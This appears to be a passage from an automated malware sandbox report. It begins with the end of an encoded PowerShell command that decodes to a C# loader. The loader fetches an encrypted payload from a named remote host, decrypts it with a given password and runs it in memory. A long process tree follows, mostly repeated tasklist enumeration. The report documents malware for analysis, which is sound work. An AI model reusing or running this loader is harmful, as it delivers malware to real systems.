A0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAbgBmAG8AIAA9ACAAQwBvAG4AcwBvAGwAZQAuAFIAZQBhAGQASwBlAHkAKAB0AHIAdQBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAQwBvAG4AcwBvAGwAZQAuAFcAcgBpAHQAZQBMAGkAbgBlACgAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgAHAAYQBzAHMAdwBvAHIAZAA7AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIAB2AG8AaQBkACAAbABvAGEAZABBAHMAcwBlAG0AYgBsAHkAKABiAHkAdABlAFsAXQAgAGIAaQBuACwAIABvAGIAagBlAGMAdABbAF0AIABjAG8AbQBtAGEAbgBkAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAbwBmAG8AcgA0AG0AcwBpAC4AbgBvAHcAKAApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEEAcwBzAGUAbQBiAGwAeQAgAGEAIAA9ACAAQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAoAGIAaQBuACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoAG4AdQBsAGwALAAgAG4AZQB3ACAAbwBiAGoAZQBjAHQAWwBdACAAewAgAGMAbwBtAG0AYQBuAGQAcwAgAH0AKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABjAGEAdABjAGgADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAATQBlAHQAaABvAGQASQBuAGYAbwAgAG0AZQB0AGgAbwBkACAAPQAgAGEALgBFAG4AdAByAHkAUABvAGkAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKABtAGUAdABoAG8AZAAgACEAPQAgAG4AdQBsAGwAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAbwBiAGoAZQBjAHQAIABvACAAPQAgAGEALgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKABtAGUAdABoAG8AZAAuAE4AYQBtAGUAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAbQBlAHQAaABvAGQALgBJAG4AdgBvAGsAZQAoAG8ALAAgAG4AdQBsAGwAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAHYAbwBpAGQAIABNAGEAaQBuACgAcABhAHIAYQBtAHMAIABzAHQAcgBpAG4AZwBbAF0AIABhAHIAZwBzACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABQAHIAaQBuAHQAQgBhAG4AbgBlAHIAKAApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAYQByAGcAcwAuAEwAZQBuAGcAdABoACAAIQA9ACAAMgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEMAbwBuAHMAbwBsAGUALgBXAHIAaQB0AGUATABpAG4AZQAoACIAUABhAHIAYQBtAGUAdABlAHIAcwAgAG0AaQBzAHMAaQBuAGcAIgApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHMAdAByAGkAbgBnACAAbABvAGMAYQB0AGkAbwBuACAAPQAgAGEAcgBnAHMAWwAwAF0AOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcwB0AHIAaQBuAGcAIABpAHMAaAB0AHQAcAAgAD0AIAAiAGgAdAB0AHAAIgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABzAHQAcgBpAG4AZwAgAFMAdABhAGcAZQAyADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAbABvAGMAYQB0AGkAbwBuAC4AUwB0AGEAcgB0AHMAVwBpAHQAaAAoAGkAcwBoAHQAdABwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABDAG8AbgBzAG8AbABlAC4AVwByAGkAdABlACgAIgBbACoAXQAgAE8AbgBlACAAbQBvAG0AZQBuAHQAIAB3AGgAaQBsAGUAIABnAGUAdAB0AGkAbgBnACAAbwB1AHIAIABmAGkAbABlACAAZgByAG8AbQAgAFUAUgBMAC4ALgAuAC4AIAAiACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAHQAYQBnAGUAMgAgAD0AIABHAGUAdABfAFMAdABhAGcAZQAyACgAbABvAGMAYQB0AGkAbwBuACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAZQBsAHMAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABDAG8AbgBzAG8AbABlAC4AVwByAGkAdABlAEwAaQBuAGUAKAAiAE4ATwAgAFUAUgBMACwAIABsAG8AYQBkAGkAbgBnACAAZgByAG8AbQAgAGQAaQBzAGsALgAiACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABDAG8AbgBzAG8AbABlAC4AVwByAGkAdABlACgAIgBbACoAXQAgAE8AbgBlACAAbQBvAG0AZQBuAHQAIAB3AGgAaQBsAGUAIABnAGUAdAB0AGkAbgBnACAAbwB1AHIAIABmAGkAbABlACAAZgByAG8AbQAgAGQAaQBzAGsALgAuAC4ALgAgACIAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFMAdABhAGcAZQAyACAAPQAgAEcAZQB0AF8AUwB0AGEAZwBlADIAZABpAHMAawAoAGwAbwBjAGEAdABpAG8AbgApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEMAbwBuAHMAbwBsAGUALgBXAHIAaQB0AGUATABpAG4AZQAoACIALQA+ACAARABvAG4AZQAiACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAQwBvAG4AcwBvAGwAZQAuAFcAcgBpAHQAZQBMAGkAbgBlACgAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABDAG8AbgBzAG8AbABlAC4AVwByAGkAdABlACgAIgBbACoAXQAgAEQAZQBjAHIAeQBwAHQAaQBuAGcAIABmAGkAbABlACAAaQBuACAAbQBlAG0AbwByAHkALgAuAC4AIAA+ACAAIgApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHMAdAByAGkAbgBnACAAUABhAHMAcwB3AG8AcgBkACAAPQAgAGEAcgBnAHMAWwAxAF0AOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAQwBvAG4AcwBvAGwAZQAuAFcAcgBpAHQAZQBMAGkAbgBlACgAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHkAdABlAFsAXQAgAGQAZQBjAG8AZABlAGQAIAA9ACAAQgBhAHMAZQA2ADQAXwBEAGUAYwBvAGQAZQAoAFMAdABhAGcAZQAyACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYgB5AHQAZQBbAF0AIABkAGUAYwBvAG0AcAByAGUAcwBzAGUAZAAgAD0AIABEAGUAYwBvAG0AcAByAGUAcwBzACgAZABlAGMAbwBkAGUAZAApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGIAeQB0AGUAWwBdACAAcABhAHMAcwB3AG8AcgBkAEIAeQB0AGUAcwAgAD0AIABFAG4AYwBvAGQAaQBuAGcALgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAUABhAHMAcwB3AG8AcgBkACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcABhAHMAcwB3AG8AcgBkAEIAeQB0AGUAcwAgAD0AIABTAEgAQQAyADUANgAuAEMAcgBlAGEAdABlACgAKQAuAEMAbwBtAHAAdQB0AGUASABhAHMAaAAoAHAAYQBzAHMAdwBvAHIAZABCAHkAdABlAHMAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHkAdABlAFsAXQAgAGIAeQB0AGUAcwBEAGUAYwByAHkAcAB0AGUAZAAgAD0AIABBAEUAUwBfAEQAZQBjAHIAeQBwAHQAKABkAGUAYwBvAG0AcAByAGUAcwBzAGUAZAAsACAAcABhAHMAcwB3AG8AcgBkAEIAeQB0AGUAcwApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAbgB0ACAAXwBzAGEAbAB0AFMAaQB6AGUAIAA9ACAANAA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHkAdABlAFsAXQAgAG8AcgBpAGcAaQBuAGEAbABCAHkAdABlAHMAIAA9ACAAbgBlAHcAIABiAHkAdABlAFsAYgB5AHQAZQBzAEQAZQBjAHIAeQBwAHQAZQBkAC4ATABlAG4AZwB0AGgAIAAtACAAXwBzAGEAbAB0AFMAaQB6AGUAXQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAaQBuAHQAIABpACAAPQAgAF8AcwBhAGwAdABTAGkAegBlADsAIABpACAAPAAgAGIAeQB0AGUAcwBEAGUAYwByAHkAcAB0AGUAZAAuAEwAZQBuAGcAdABoADsAIABpACsAKwApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAG8AcgBpAGcAaQBuAGEAbABCAHkAdABlAHMAWwBpACAALQAgAF8AcwBhAGwAdABTAGkAegBlAF0AIAA9ACAAYgB5AHQAZQBzAEQAZQBjAHIAeQBwAHQAZQBkAFsAaQBdADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAG8AYgBqAGUAYwB0AFsAXQAgAGMAbQBkACAAPQAgAGEAcgBnAHMALgBTAGsAaQBwACgAMgApAC4AVABvAEEAcgByAGEAeQAoACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAbABvAGEAZABBAHMAcwBlAG0AYgBsAHkAKABvAHIAaQBnAGkAbgBhAGwAQgB"5"AHQAZQBzACwAIABjAG0AZAApADsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKACIAQAANAAoADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABzAGgAYQByAHAAbABvAGEAZABlAHIADQAKAA0ACgBpAGYAIAAoACQAbgBvAEEAcgBnAHMAKQANAAoAewANAAoAIAAgACAAIABbAFMAaABhAHIAcABMAG8AYQBkAGUAcgAuAFAAcgBvAGcAcgBhAG0AXQA6ADoATQBhAGkAbgAoACIAJABsAG8AYwBhAHQAaQBvAG4AIgAsACIAJABwAGEAcwBzAHcAbwByAGQAIgApAA0ACgB9AA0ACgBlAGwAcwBlAGkAZgAgACgAJABhAHIAZwB1AG0AZQBuAHQAMwApAA0ACgB7AA0ACgAgACAAIAAgAFsAUwBoAGEAcgBwAEwAbwBhAGQAZQByAC4AUAByAG8AZwByAGEAbQBdADoAOgBNAGEAaQBuACgAIgAkAGwAbwBjAGEAdABpAG8AbgAiACwAIgAkAHAAYQBzAHMAdwBvAHIAZAAiACwAIgAkAGEAcgBnAHUAbQBlAG4AdAAiACwAIgAkAGEAcgBnAHUAbQBlAG4AdAAyACIALAAgACIAJABhAHIAZwB1AG0AZQBuAHQAMwAiACkADQAKAH0ADQAKAGUAbABzAGUAaQBmACAAKAAkAGEAcgBnAHUAbQBlAG4AdAAyACkADQAKAHsADQAKACAAIAAgACAAWwBTAGgAYQByAHAATABvAGEAZABlAHIALgBQAHIAbwBnAHIAYQBtAF0AOgA6AE0AYQBpAG4AKAAiACQAbABvAGMAYQB0AGkAbwBuACIALAAiACQAcABhAHMAcwB3AG8AcgBkACIALAAiACQAYQByAGcAdQBtAGUAbgB0ACIALAAiACQAYQByAGcAdQBtAGUAbgB0ADIAIgApAA0ACgB9AA0ACgBlAGwAcwBlAGkAZgAgACgAJABhAHIAZwB1AG0AZQBuAHQA"K"QANAAoAewANAAoAIAAgACAAIABbAFMAaABhAHIAcABMAG8AYQBkAGUAcgAuAFAAcgBvAGcAcgBhAG0AXQA6ADoATQBhAGkAbgAoACIAJABsAG8AYwBhAHQAaQBvAG4AIgAsACIAJABwAGEAcwBzAHcAbwByAGQAIgAsACIAJABhAHIAZwB1AG0AZQBuAHQAIgApAA0ACgB9AA0ACgANAAoAfQANAAoADQAKAA0ACgBJAG4AdgBvAGsAZQAtAFMAaABhAHIAcABMAG8AYQBkAGUAcgAgAC0AbABvAGMAYQB0AGkAbwBuACAAIgBoAHQAdABwAHMAOgAvAC8AYwBvAHMAbQBvAHAAbAB3AG4AZQB0AHMALgB4AHkAegAvAC4AdwBlAGwAbAAtAGsAbgBvAHcAbgAvAHAAawBpAC0AdgBhAGwAaQBkAGEAdABpAG8AbgAvAGMAYQBsAGMALgBlAG4AYwAiACAALQBwAGEAcwBzAHcAbwByAGQAIABVAHcAVQBGAHUAZgB1ADEAIAAtAG4AbwBBAHIAZwBzAA==
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2292
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5ceuo42k\5ceuo42k.cmdline"
        6⤵
        
        PID:3376
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6C1.tmp" "c:\Users\Admin\AppData\Local\Temp\5ceuo42k\CSC21DC4250409947DDB963764D8ADA9799.TMP"
        7⤵
        
        PID:4760
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2952
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:1580
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:856
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:1628
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1244
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4272
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4468
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        
        PID:1584
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1556
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        
        PID:2148
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:116
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:512
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3760
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:972
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1624
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4756
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        
        PID:2464
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1912
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:1628
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3108
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:2032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3764
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        
        PID:4496
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3448
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:1268
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1164
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:2680
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:264
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5056
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4076
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:2356
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3872
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4680
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2580
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:824
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3756
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        
        PID:3188
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4808
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        
        PID:2432
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3696
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:3468
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2420
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        
        PID:3192
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3580
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5040
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3796
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:2616
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4496
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5060
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1016
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:3392
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1100
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        
        PID:1164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4932
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4920
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4980
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        
        PID:2960
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3668
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:1144
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2864
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:2516
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2408
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        
        PID:3188
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1892
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4756
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4676
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:964
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2384
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        
        PID:3708
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4584
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:2052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1636
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4436
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3796
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4328
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1492
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:1268
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1724
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:2148
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2600
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4536
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:968
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        
        PID:864
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5104
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:2960
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3068
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4944
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1648
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:2460
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5008
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:2240
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4384
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        
        PID:4004
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3188
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:3164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1076
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:3224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3584
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:3544
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4324
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        
        PID:4480
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3820
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:1476
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4436
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:1804
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4348
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        
        PID:3140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1052
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        
        PID:1268
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3800
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:3392
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
